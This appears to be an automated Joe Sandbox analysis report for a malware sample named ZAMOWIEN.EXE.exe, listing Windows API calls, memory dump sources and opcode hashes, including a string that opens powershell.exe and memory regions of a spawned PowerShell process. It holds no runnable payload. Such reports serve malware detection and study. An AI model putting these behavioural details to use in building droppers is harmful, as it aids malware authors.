                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 526848415f932e083bf7b3d36508f4b1bda904cbcea418d5975b356f5bc0ad6e
                                                            • Instruction ID: 3809fe6f76d1dc233f133599f097e33c3f6845b257957cd8da61e999df3fb19a
                                                            • Opcode Fuzzy Hash: 526848415f932e083bf7b3d36508f4b1bda904cbcea418d5975b356f5bc0ad6e
                                                            • Instruction Fuzzy Hash: BA0184B1100248AFDF219F61DD80A9B3B29F7C5751F204037FB04761D1C77A9C9297AA
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                                            • WriteFile.KERNEL32(00000000,?,open "powershell.exe",00000000,?,?,00000000,00000011), ref: 0040250C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: FileWritelstrlen
                                                            • String ID: open "powershell.exe"
                                                            • API String ID: 427699356-233085048
                                                            • Opcode ID: 780f0236de7fd1f7e9a500e56c7e6a15efc65af156f7b9d5e1e92e7abff44f4a
                                                            • Instruction ID: 6a42f5992006efeb6b2b1e3b7836ad9eb28beba8801b06696a3c4cf9cb3ed08d
                                                            • Opcode Fuzzy Hash: 780f0236de7fd1f7e9a500e56c7e6a15efc65af156f7b9d5e1e92e7abff44f4a
                                                            • Instruction Fuzzy Hash: ADF0E272A44241BFDB00EBA09E4AAAF7768DB01308F10843FB101F50C2D5FC9A41AB2D
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B3410,0040356A,004033AE,?), ref: 004035AC
                                                            • GlobalFree.KERNEL32(00000000), ref: 004035B3
                                                            Strings
                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004035A4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Free$GlobalLibrary
                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                            • API String ID: 1100898210-2382934351
                                                            • Opcode ID: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                            • Instruction ID: b9a2e2ce0aef398ad33b1e441a7329442b5d03f4bc4d662dbe049a431942ec15
                                                            • Opcode Fuzzy Hash: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                            • Instruction Fuzzy Hash: CAE01233805530ABC6215F55FE04B5AB7686F99B23F05406BED407B2B087BCAD42CBD9
                                                            APIs
                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,80000000,00000003), ref: 00405676
                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,80000000,00000003), ref: 00405684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-3976562730
                                                            • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                            • Instruction ID: 65254a9ec8b5df5b99da38f47da5785a41c3eb4d4675478388f5dfb88e302bf1
                                                            • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                            • Instruction Fuzzy Hash: 7AD0A762808D702EF30356108C04B9F6A98CF12300F0A08A2E040A61D1D67D5C414BBE
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059A1,00000000,[Rename]), ref: 0040579F
                                                            • lstrcmpiA.KERNEL32(?,?), ref: 004057B7
                                                            • CharNextA.USER32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057C8
                                                            • lstrlenA.KERNEL32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                            • Instruction ID: 45b2fc5df358d27cb7a89cd885ee1e3cc50cd312c5ff5344edc01a70ab2dde4a
                                                            • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                            • Instruction Fuzzy Hash: 71F06235504518FFC7129BA5DC4099FBBA8EF55350F2540AAE800F7250D674EE01ABA9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80e28a592d0f197998006b86f948533578d9866230e732673ddae54aab7c223f
                                                            • Instruction ID: 88fbbb77e8bd4acda44bd0cc49d153a762b6ae7a0f29ca9ad45e0de1c2588cbc
                                                            • Opcode Fuzzy Hash: 80e28a592d0f197998006b86f948533578d9866230e732673ddae54aab7c223f
                                                            • Instruction Fuzzy Hash: 32032CB4A10215DFE724DF64CD50BAAB7B2EF85704F1084A9D90AAB781DB31ED81CF61
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1675761583.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6aaac84f16c7268969fc6c5cdeb9fc33ef874d1c10d9cb52d9dd5c8587586fbd
                                                            • Instruction ID: a62e992629bbc81a0d536a5b470b97c549421848e4bafdd9abef0b5b7fa08f15
                                                            • Opcode Fuzzy Hash: 6aaac84f16c7268969fc6c5cdeb9fc33ef874d1c10d9cb52d9dd5c8587586fbd
                                                            • Instruction Fuzzy Hash: AF627A34B00619CFDB28DB64D854BADBBB2EF85305F1084E9D50AAB251FB34E986CF51
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66566ee57cd2a7fcd404409a1b64452ba04e6893f305cd502bfc0e87e9bd74c2
                                                            • Instruction ID: 67121455d08cfb798e9bb7a0fcf6b3bf8a4c2812738063e691888bd84bd51e4d
                                                            • Opcode Fuzzy Hash: 66566ee57cd2a7fcd404409a1b64452ba04e6893f305cd502bfc0e87e9bd74c2
                                                            • Instruction Fuzzy Hash: 80C252B4A003159FE734DF64C950B9AB7B2EF85704F10C4A9D81AAB785CB31ED818FA5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1675761583.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b302b607c2da1cf5adbf5f76d9012f14195beb41a5c1ea9d7b6257077194f8d
                                                            • Instruction ID: 7a96233f22a3870d089896ea78d0718ef735f7912bb9efd67f9018c8e5b348f5
                                                            • Opcode Fuzzy Hash: 2b302b607c2da1cf5adbf5f76d9012f14195beb41a5c1ea9d7b6257077194f8d
                                                            • Instruction Fuzzy Hash: A782E070A053889FDB06DF68C494ADDBFB1EF4A310F1981C6D444AF262E734AD46CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46be9deec33d9df2e1538caec7e45c86fc11e29b80d361387491b504e3c24ce7
                                                            • Instruction ID: 517d61b7a5f6d7e5fcd0f326ff37d72463a745310f13183a87ee4fe07173794e
                                                            • Opcode Fuzzy Hash: 46be9deec33d9df2e1538caec7e45c86fc11e29b80d361387491b504e3c24ce7
                                                            • Instruction Fuzzy Hash: 0E826DB0A00254DFEB24DF54C950B9AB7B2EF85744F10C5A9D91AABB40DB71EC81CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a85951ca593956d444c441aff5c88ca51abc435bcff729cdcf8a6c18c2d36e39
                                                            • Instruction ID: 52b9bf3e86ade124ca6bf68e66bb7a88101df035c1a69f64e017488b38de504a
                                                            • Opcode Fuzzy Hash: a85951ca593956d444c441aff5c88ca51abc435bcff729cdcf8a6c18c2d36e39
                                                            • Instruction Fuzzy Hash: E78260B0A00254DFEB34DF54C950BAAB7B2EF85704F10C5A9D91AAB741CB71ED818FA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26ebb2d808beba1a8a5fd9c8dce0051137ec27b2e8731664d81fb662f3ca75fc
                                                            • Instruction ID: b76cb18bafe3a89ffa888ca88e145b6418168a0e1b957467ce613a19fdaebbfd
                                                            • Opcode Fuzzy Hash: 26ebb2d808beba1a8a5fd9c8dce0051137ec27b2e8731664d81fb662f3ca75fc
                                                            • Instruction Fuzzy Hash: 3B727FB4A00254DFEB24DF54C950B9AB7B2EF85744F10C5A9D91AABB40CB71EC81CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7ce86ea22e53b646139ad540c4a5128baf7bc393ef7cac27c2147447f7ee43f
                                                            • Instruction ID: 46495586b6b5ca6d9899e159024597aa28faa58645280f23295b9ef481aaad95
                                                            • Opcode Fuzzy Hash: e7ce86ea22e53b646139ad540c4a5128baf7bc393ef7cac27c2147447f7ee43f
                                                            • Instruction Fuzzy Hash: 4452EFB0F002499FDB14CFA8C454BAABBB2EF85714F14806AE905DF791DA76DC41CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d97e945fb46855b58f4613db3ff1c0abfbb42646f40dd3a2a31c6aa95738efb4
                                                            • Instruction ID: f7b64e4e5044672873bf3bad1f761c44e71831cebe7ce7539c45044bc328b0fd
                                                            • Opcode Fuzzy Hash: d97e945fb46855b58f4613db3ff1c0abfbb42646f40dd3a2a31c6aa95738efb4
                                                            • Instruction Fuzzy Hash: 21526DB0A00254DFEB34DF14C950B9AB7B2EF85704F10C5A9D91AAB781CB71ED818FA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f683c53fcc15d838e2e49378a293f415276d2d3a59cdcc08dd0d4193ff915221
                                                            • Instruction ID: 1c14705e317e6a1f8d9703cefea1ce6a8327b34390bc104877076016bb6b9eb0
                                                            • Opcode Fuzzy Hash: f683c53fcc15d838e2e49378a293f415276d2d3a59cdcc08dd0d4193ff915221
                                                            • Instruction Fuzzy Hash: 4A4263B0A013159FE734DF64C950BAAB7B2EF85704F10C4A9D81AAB785CB31ED418FA5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89ffb5c72d60062b9c29ffb0e5d778f75cc2b3901fb51eac23f23647143fd80f
                                                            • Instruction ID: 609253f09ab1b973119ec9932280cb19066168906b2f74c77075f2d1ba18743d
                                                            • Opcode Fuzzy Hash: 89ffb5c72d60062b9c29ffb0e5d778f75cc2b3901fb51eac23f23647143fd80f
                                                            • Instruction Fuzzy Hash: D51235B1B043198FDB259F6988117ABBBA2EFD1251F14C07BD905CB641EB32C941CBA2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e14ac22584e8ff259cfac6a31b191a8771df959d3d2fd9f4f450124216fe39a4
                                                            • Instruction ID: f2460c0807454ba970cf57135a13c628469dc372ea6a3b4255a20ad3879b2314
                                                            • Opcode Fuzzy Hash: e14ac22584e8ff259cfac6a31b191a8771df959d3d2fd9f4f450124216fe39a4
                                                            • Instruction Fuzzy Hash: A5026AB4B10248DFDB14DF98C494FA9BBB2EF85715F148069E905AB392CB72EC41CB91
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ecbdc0e862d534c05ea4983d2aa98064f595c7429b452dec1a768fb6bb56df9
                                                            • Instruction ID: 09ebf5c7c5e39fe876be0e901b50c1ade5388080010f6337443d74c0074920dd
                                                            • Opcode Fuzzy Hash: 0ecbdc0e862d534c05ea4983d2aa98064f595c7429b452dec1a768fb6bb56df9
                                                            • Instruction Fuzzy Hash: 5C121CB0A10215DFEB34CF24CD50BAAB7B2EB55704F1084E9D95AAB640DB71EE81CF61
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfd2412f5af42939e11b5bf348c10f8fef8d25748d049efce2956a063e8c8ae2
                                                            • Instruction ID: 5788fa7f89fc7e2b710e6f0c4ed4a621bf86959ae505924db969acaf346cb069
                                                            • Opcode Fuzzy Hash: dfd2412f5af42939e11b5bf348c10f8fef8d25748d049efce2956a063e8c8ae2
                                                            • Instruction Fuzzy Hash: 10120DB0A10219DFEB34CF24CD50BA9B7B2EB55704F1084A9D95AAB740DB71EE81CF61
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 342f93f1bfe0dd97916e9bd4d8403dbaa5233e7c7a2510c9372280249a7a20ed
                                                            • Instruction ID: feae769ad4557a08287958281896fc7d027309445b4488590a66f5a4afd87c17
                                                            • Opcode Fuzzy Hash: 342f93f1bfe0dd97916e9bd4d8403dbaa5233e7c7a2510c9372280249a7a20ed
                                                            • Instruction Fuzzy Hash: 62E18AB0A102049FDB28DF64C554BAEB7B3EF85714F548029D802AF795DB76EC428BA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1675761583.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 801e00b769038bf985d2de075275bd6fd3daebfa9e7ecc816a95934f88f5bb42
                                                            • Instruction ID: 82afdb94e92b10f476c0fb05178c3868173cde3533b9e5f061cd2322baf6b26a
                                                            • Opcode Fuzzy Hash: 801e00b769038bf985d2de075275bd6fd3daebfa9e7ecc816a95934f88f5bb42
                                                            • Instruction Fuzzy Hash: 45C18F35A00208DFDB14DFA4D944AADBBB2FF85314F1585A9E8069F364EB35ED4ACB40
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6d2174ef9688c72e4c85d55338eb466f152d3054a8658a6140cad1c5e4c21d9
                                                            • Instruction ID: a45629b2d53ac6334c98c0a61acfc759fc3db0da7268d7b2b0b334b7f67d4fb0
                                                            • Opcode Fuzzy Hash: f6d2174ef9688c72e4c85d55338eb466f152d3054a8658a6140cad1c5e4c21d9
                                                            • Instruction Fuzzy Hash: 5FC169B4A102059FDB28DF54C544BAEBBB3AF89714F14C029D805AF795CB76EC428BA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1675761583.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eba69132eadbbe6dc48c1b4e4d90618313d6c12f0d55d1c9b1dd84d45bdcb379
                                                            • Instruction ID: d19195afd052c131eb308108c709898bf3e8be1276d5ac280b8343672c2d0f7e
                                                            • Opcode Fuzzy Hash: eba69132eadbbe6dc48c1b4e4d90618313d6c12f0d55d1c9b1dd84d45bdcb379
                                                            • Instruction Fuzzy Hash: E8A1C370A043858FC71ACF58C490AAABBB1FF8A310B1545DAD445DB3A6D736FC41CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1681326837.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e216ac2563c3fa08fe64ff927d0f2a0993896951426aaea0ff8ae5b962274c37
                                                            • Instruction ID: f5f6f6278961b671d53b82f7f7d7ace7b298b14d06db542c981c3452dd9b37cd
                                                            • Opcode Fuzzy Hash: e216ac2563c3fa08fe64ff927d0f2a0993896951426aaea0ff8ae5b962274c37
                                                            • Instruction Fuzzy Hash: C17148B1B10316DFDB24DF2898007AABBF1EF91A14F5485BACC05CB251FA31D945CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1675761583.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 538243b482bf79f422406826b288894057a186ed6332a41ff9e1186573524551
                                                            • Instruction ID: 5346c4a7f0d1cc5ccae705d4bd47087b160a89e70b727a7077b0478c87c8bb83
                                                            • Opcode Fuzzy Hash: 538243b482bf79f422406826b288894057a186ed6332a41ff9e1186573524551
                                                            • Instruction Fuzzy Hash: AF717E30A00209CFDB14DF68C894AEDBBF6EF85314F1489AAD415DB651EB75AC46CB90
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1675761583.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
